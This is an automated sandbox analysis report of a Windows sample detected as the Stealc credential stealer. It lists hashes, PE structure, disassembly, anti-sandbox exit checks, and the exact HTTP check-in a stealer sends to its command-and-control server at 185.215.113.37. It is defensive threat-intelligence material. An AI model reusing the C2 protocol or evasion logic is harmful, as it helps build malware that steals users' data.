                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/2file.exe, 00000000.00000002.2090478959.00000000015F7000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpDHfile.exe, 00000000.00000002.2090478959.00000000015F7000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php=kfile.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.37
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1523733
                      Start date and time:2024-10-02 00:36:07 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 44s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:2
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 88
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: file.exe

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.952907434341649
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'894'400 bytes
                      MD5:ff898723c4c693eec7140d101d0066d4
                      SHA1:3127d0d4a74c0d4f3f05a548a39f2fad684c5cb8
                      SHA256:61959a4f6720629f28f97cb7341d9ac81fb91c91e97ddc28f9840b6eae8bac58
                      SHA512:ad5566e7ab986c3b9edd7fd4d400722933bef18257f16a10978d0778994705f4ee80ba6a0cd9fb938e5fafff81e0fa95d377d95f08e6903a3e8098b4e675f87f
                      SSDEEP:49152:YJolkijNKQR+xs4HoV8+13jvkd/ZNG5q9TP2KYW:molhNYxdH2zktK54z2KJ
                      TLSH:1895332A8B998372E17A557EB72C6E30DF171A1ED7E432DB4C01790503D7C887B9A8B4
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0xaba000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007F3A30BA194Ah
                      shufps xmm3, dqword ptr [eax+eax], 00h
                      add byte ptr [eax], al
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      inc ecx
                      push bx
                      dec esi
                      dec ebp
                      das
                      xor al, 36h
                      dec edi
                      bound ecx, dword ptr [ecx+4Ah]
                      dec edx
                      insd
                      push edi
                      dec eax
                      dec eax
                      jbe 00007F3A30BA19B2h
                      push esi
                      dec edx
                      popad
                      je 00007F3A30BA19ABh
                      push edx
                      dec esi
                      jc 00007F3A30BA19BAh
                      cmp byte ptr [ebx], dh
                      push edx
                      jns 00007F3A30BA1987h
                      or eax, 49674B0Ah
                      cmp byte ptr [edi+43h], dl
                      jnc 00007F3A30BA198Dh
                      bound eax, dword ptr [ecx+30h]
                      pop edx
                      inc edi
                      push esp
                      push 43473163h
                      aaa
                      push edi
                      dec esi
                      xor ebp, dword ptr [ebx+59h]
                      push edi
                      push edx
                      pop eax
                      je 00007F3A30BA1997h
                      xor dl, byte ptr [ebx+2Bh]
                      popad
                      jne 00007F3A30BA198Ch
                      dec eax
                      dec ebp
                      jo 00007F3A30BA1983h
                      xor dword ptr [edi], esi
                      inc esp
                      dec edx
                      dec ebp
                      jns 00007F3A30BA1990h
                      insd
                      jnc 00007F3A30BA19B0h
                      aaa
                      inc esp
                      inc ecx
                      inc ebx
                      xor dl, byte ptr [ecx+4Bh]
                      inc edx
                      inc esp
                      bound esi, dword ptr [ebx]
                      or eax, 63656B0Ah
                      jno 00007F3A30BA1998h
                      push edx
                      insb
                      js 00007F3A30BA19B1h
                      outsb
                      inc ecx
                      jno 00007F3A30BA1992h
                      push ebp
                      inc esi
                      pop edx
                      xor eax, dword ptr [ebx+36h]
                      push eax
                      aaa
                      imul edx, dword ptr [ebx+58h], 4Eh
                      aaa
                      inc ebx
                      jbe 00007F3A30BA198Ch
                      dec ebx
                      js 00007F3A30BA1983h
                      jne 00007F3A30BA1971h
                      push esp
                      inc bp
                      outsb
                      inc edx
                      popad
                      dec ebx
                      insd
                      dec ebp
                      inc edi
                      xor dword ptr [ecx+36h], esp
                      push 0000004Bh
                      sub eax, dword ptr [ebp+33h]
                      jp 00007F3A30BA199Ch
                      dec edx
                      xor bh, byte ptr [edx+56h]
                      bound eax, dword ptr [edi+66h]
                      jbe 00007F3A30BA197Ah
                      dec eax
                      or eax, 506C720Ah
                      aaa
                      xor dword ptr fs:[ebp+62h], ecx
                      arpl word ptr [esi], si
                      inc esp
                      jo 00007F3A30BA19B3h

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x25b0000x228005139d7c1d8979e30cdfcd2bf6fee9fdcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x25e0000x2b20000x200de8fcd28a84031f6a6bfa6a5e8865082unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      yvmyyuzz0x5100000x1a90000x1a8600fee9661bbdb463fd6dc64d04a6b1005dFalse0.9950593703976436data7.954108678266825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      loyfpxav0x6b90000x10000x400dd2d15d613dfb86699fd3812790beea4False0.81640625data6.224070601811863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x6ba0000x30000x2200183fe47a71cf1ec5ffba15d827a984d6False0.38556985294117646DOS executable (COM)4.096529025068852IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-10-02T00:37:03.842008+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 2, 2024 00:37:02.885529995 CEST4970480192.168.2.5185.215.113.37
                      Oct 2, 2024 00:37:02.890322924 CEST8049704185.215.113.37192.168.2.5
                      Oct 2, 2024 00:37:02.890388966 CEST4970480192.168.2.5185.215.113.37
                      Oct 2, 2024 00:37:02.890585899 CEST4970480192.168.2.5185.215.113.37
                      Oct 2, 2024 00:37:02.895447969 CEST8049704185.215.113.37192.168.2.5
                      Oct 2, 2024 00:37:03.604516983 CEST8049704185.215.113.37192.168.2.5
                      Oct 2, 2024 00:37:03.604618073 CEST4970480192.168.2.5185.215.113.37
                      Oct 2, 2024 00:37:03.607510090 CEST4970480192.168.2.5185.215.113.37
                      Oct 2, 2024 00:37:03.614140987 CEST8049704185.215.113.37192.168.2.5
                      Oct 2, 2024 00:37:03.841939926 CEST8049704185.215.113.37192.168.2.5
                      Oct 2, 2024 00:37:03.842008114 CEST4970480192.168.2.5185.215.113.37
                      Oct 2, 2024 00:37:06.629631996 CEST4970480192.168.2.5185.215.113.37

                      HTTP Request Dependency Graph

                      • 185.215.113.37

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549704185.215.113.37802956C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Oct 2, 2024 00:37:02.890585899 CEST89OUTGET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Oct 2, 2024 00:37:03.604516983 CEST203INHTTP/1.1 200 OK
                      Date: Tue, 01 Oct 2024 22:37:03 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Oct 2, 2024 00:37:03.607510090 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDH
                      Host: 185.215.113.37
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 46 36 39 46 30 37 44 34 46 43 33 30 37 31 38 35 39 34 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 2d 2d 0d 0a
                      Data Ascii: ------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="hwid"01F69F07D4FC3071859460------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="build"doma------KECBKKEBKEBFCAAAEGDH--
                      Oct 2, 2024 00:37:03.841939926 CEST210INHTTP/1.1 200 OK
                      Date: Tue, 01 Oct 2024 22:37:03 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      System Behavior

                      General

                      Target ID:0
                      Start time:18:36:59
                      Start date:01/10/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x990000
                      File size:1'894'400 bytes
                      MD5 hash:FF898723C4C693EEC7140D101D0066D4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2046702174.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:7.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:10.1%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:24
                        execution_graph 13489 9a69f0 13534 992260 13489->13534 13513 9a6a64 13514 9aa9b0 4 API calls 13513->13514 13515 9a6a6b 13514->13515 13516 9aa9b0 4 API calls 13515->13516 13517 9a6a72 13516->13517 13518 9aa9b0 4 API calls 13517->13518 13519 9a6a79 13518->13519 13520 9aa9b0 4 API calls 13519->13520 13521 9a6a80 13520->13521 13686 9aa8a0 13521->13686 13523 9a6b0c 13690 9a6920 GetSystemTime 13523->13690 13525 9a6a89 13525->13523 13527 9a6ac2 OpenEventA 13525->13527 13529 9a6ad9 13527->13529 13530 9a6af5 CloseHandle Sleep 13527->13530 13533 9a6ae1 CreateEventA 13529->13533 13532 9a6b0a 13530->13532 13532->13525 13533->13523 13887 9945c0 13534->13887 13536 992274 13537 9945c0 2 API calls 13536->13537 13538 99228d 13537->13538 13539 9945c0 2 API calls 13538->13539 13540 9922a6 13539->13540 13541 9945c0 2 API calls 13540->13541 13542 9922bf 13541->13542 13543 9945c0 2 API calls 13542->13543 13544 9922d8 13543->13544 13545 9945c0 2 API calls 13544->13545 13546 9922f1 13545->13546 13547 9945c0 2 API calls 13546->13547 13548 99230a 13547->13548 13549 9945c0 2 API calls 13548->13549 13550 992323 13549->13550 13551 9945c0 2 API calls 13550->13551 13552 99233c 13551->13552 13553 9945c0 2 API calls 13552->13553 13554 992355 13553->13554 13555 9945c0 2 API calls 13554->13555 13556 99236e 13555->13556 13557 9945c0 2 API calls 13556->13557 13558 992387 13557->13558 13559 9945c0 2 API calls 13558->13559 13560 9923a0 13559->13560 13561 9945c0 2 API calls 13560->13561 13562 9923b9 13561->13562 13563 9945c0 2 API calls 13562->13563 13564 9923d2 13563->13564 13565 9945c0 2 API calls 13564->13565 13566 9923eb 13565->13566 13567 9945c0 2 API calls 13566->13567 13568 992404 13567->13568 13569 9945c0 2 API calls 13568->13569 13570 99241d 13569->13570 13571 9945c0 2 API calls 13570->13571 13572 992436 13571->13572 13573 9945c0 2 API calls 13572->13573 13574 99244f 13573->13574 13575 9945c0 2 API calls 13574->13575 13576 992468 13575->13576 13577 9945c0 2 API calls 13576->13577 13578 992481 13577->13578 13579 9945c0 2 API calls 13578->13579 13580 99249a 13579->13580 13581 9945c0 2 API calls 13580->13581 13582 9924b3 13581->13582 13583 9945c0 2 API calls 13582->13583 13584 9924cc 13583->13584 13585 9945c0 2 API calls 13584->13585 13586 9924e5 13585->13586 13587 9945c0 2 API calls 13586->13587 13588 9924fe 13587->13588 13589 9945c0 2 API calls 13588->13589 13590 992517 13589->13590 13591 9945c0 2 API calls 13590->13591 13592 992530 13591->13592 13593 9945c0 2 API calls 13592->13593 13594 992549 13593->13594 13595 9945c0 2 API calls 13594->13595 13596 992562 13595->13596 13597 9945c0 2 API calls 13596->13597 13598 99257b 13597->13598 13599 9945c0 2 API calls 13598->13599 13600 992594 13599->13600 13601 9945c0 2 API calls 13600->13601 13602 9925ad 13601->13602 13603 9945c0 2 API calls 13602->13603 13604 9925c6 13603->13604 13605 9945c0 2 API calls 13604->13605 13606 9925df 13605->13606 13607 9945c0 2 API calls 13606->13607 13608 9925f8 13607->13608 13609 9945c0 2 API calls 13608->13609 13610 992611 13609->13610 13611 9945c0 2 API calls 13610->13611 13612 99262a 13611->13612 13613 9945c0 2 API calls 13612->13613 13614 992643 13613->13614 13615 9945c0 2 API calls 13614->13615 13616 99265c 13615->13616 13617 9945c0 2 API calls 13616->13617 13618 992675 13617->13618 13619 9945c0 2 API calls 13618->13619 13620 99268e 13619->13620 13621 9a9860 13620->13621 13892 9a9750 GetPEB 13621->13892 13623 9a9868 13624 9a987a 13623->13624 13625 9a9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13623->13625 13628 9a988c 21 API calls 13624->13628 13626 9a9b0d 13625->13626 13627 9a9af4 GetProcAddress 13625->13627 13629 9a9b46 13626->13629 13630 9a9b16 GetProcAddress GetProcAddress 13626->13630 13627->13626 13628->13625 13631 9a9b68 13629->13631 13632 9a9b4f GetProcAddress 13629->13632 13630->13629 13633 9a9b89 13631->13633 13634 9a9b71 GetProcAddress 13631->13634 13632->13631 13635 9a9b92 GetProcAddress GetProcAddress 13633->13635 13636 9a6a00 13633->13636 13634->13633 13635->13636 13637 9aa740 13636->13637 13638 9aa750 13637->13638 13639 9a6a0d 13638->13639 13640 9aa77e lstrcpy 13638->13640 13641 9911d0 13639->13641 13640->13639 13642 9911e8 13641->13642 13643 99120f ExitProcess 13642->13643 13644 991217 13642->13644 13645 991160 GetSystemInfo 13644->13645 13646 99117c ExitProcess 13645->13646 13647 991184 13645->13647 13648 991110 GetCurrentProcess VirtualAllocExNuma 13647->13648 13649 991149 13648->13649 13650 991141 ExitProcess 13648->13650 13893 9910a0 VirtualAlloc 13649->13893 13653 991220 13897 9a89b0 13653->13897 13656 991249 __aulldiv 13657 99129a 13656->13657 13658 991292 ExitProcess 13656->13658 13659 9a6770 GetUserDefaultLangID 13657->13659 13660 9a6792 13659->13660 13661 9a67d3 13659->13661 13660->13661 13662 9a67cb ExitProcess 13660->13662 13663 9a67ad ExitProcess 13660->13663 13664 9a67a3 ExitProcess 13660->13664 13665 9a67c1 ExitProcess 13660->13665 13666 9a67b7 ExitProcess 13660->13666 13667 991190 13661->13667 13662->13661 13668 9a78e0 3 API calls 13667->13668 13669 99119e 13668->13669 13670 9911cc 13669->13670 13671 9a7850 3 API calls 13669->13671 13674 9a7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13670->13674 13672 9911b7 13671->13672 13672->13670 13673 9911c4 ExitProcess 13672->13673 13675 9a6a30 13674->13675 13676 9a78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13675->13676 13677 9a6a43 13676->13677 13678 9aa9b0 13677->13678 13899 9aa710 13678->13899 13680 9aa9c1 lstrlen 13682 9aa9e0 13680->13682 13681 9aaa18 13900 9aa7a0 13681->13900 13682->13681 13684 9aa9fa lstrcpy lstrcat 13682->13684 13684->13681 13685 9aaa24 13685->13513 13687 9aa8bb 13686->13687 13688 9aa90b 13687->13688 13689 9aa8f9 lstrcpy 13687->13689 13688->13525 13689->13688 13904 9a6820 13690->13904 13692 9a698e 13693 9a6998 sscanf 13692->13693 13933 9aa800 13693->13933 13695 9a69aa SystemTimeToFileTime SystemTimeToFileTime 13696 9a69ce 13695->13696 13697 9a69e0 13695->13697 13696->13697 13698 9a69d8 ExitProcess 13696->13698 13699 9a5b10 13697->13699 13700 9a5b1d 13699->13700 13701 9aa740 lstrcpy 13700->13701 13702 9a5b2e 13701->13702 13935 9aa820 lstrlen 13702->13935 13705 9aa820 2 API calls 13706 9a5b64 13705->13706 13707 9aa820 2 API calls 13706->13707 13708 9a5b74 13707->13708 13939 9a6430 13708->13939 13711 9aa820 2 API calls 13712 9a5b93 13711->13712 13713 9aa820 2 API calls 13712->13713 13714 9a5ba0 13713->13714 13715 9aa820 2 API calls 13714->13715 13716 9a5bad 13715->13716 13717 9aa820 2 API calls 13716->13717 13718 9a5bf9 13717->13718 13948 9926a0 13718->13948 13726 9a5cc3 13727 9a6430 lstrcpy 13726->13727 13728 9a5cd5 13727->13728 13729 9aa7a0 lstrcpy 13728->13729 13730 9a5cf2 13729->13730 13731 9aa9b0 4 API calls 13730->13731 13732 9a5d0a 13731->13732 13733 9aa8a0 lstrcpy 13732->13733 13734 9a5d16 13733->13734 13735 9aa9b0 4 API calls 13734->13735 13736 9a5d3a 13735->13736 13737 9aa8a0 lstrcpy 13736->13737 13738 9a5d46 13737->13738 13739 9aa9b0 4 API calls 13738->13739 13740 9a5d6a 13739->13740 13741 9aa8a0 lstrcpy 13740->13741 13742 9a5d76 13741->13742 13743 9aa740 lstrcpy 13742->13743 13744 9a5d9e 13743->13744 14674 9a7500 GetWindowsDirectoryA 13744->14674 13747 9aa7a0 lstrcpy 13748 9a5db8 13747->13748 14684 994880 13748->14684 13750 9a5dbe 14829 9a17a0 13750->14829 13752 9a5dc6 13753 9aa740 lstrcpy 13752->13753 13754 9a5de9 13753->13754 13755 991590 lstrcpy 13754->13755 13756 9a5dfd 13755->13756 14845 995960 13756->14845 13758 9a5e03 14989 9a1050 13758->14989 13760 9a5e0e 13761 9aa740 lstrcpy 13760->13761 13762 9a5e32 13761->13762 13763 991590 lstrcpy 13762->13763 13764 9a5e46 13763->13764 13765 995960 34 API calls 13764->13765 13766 9a5e4c 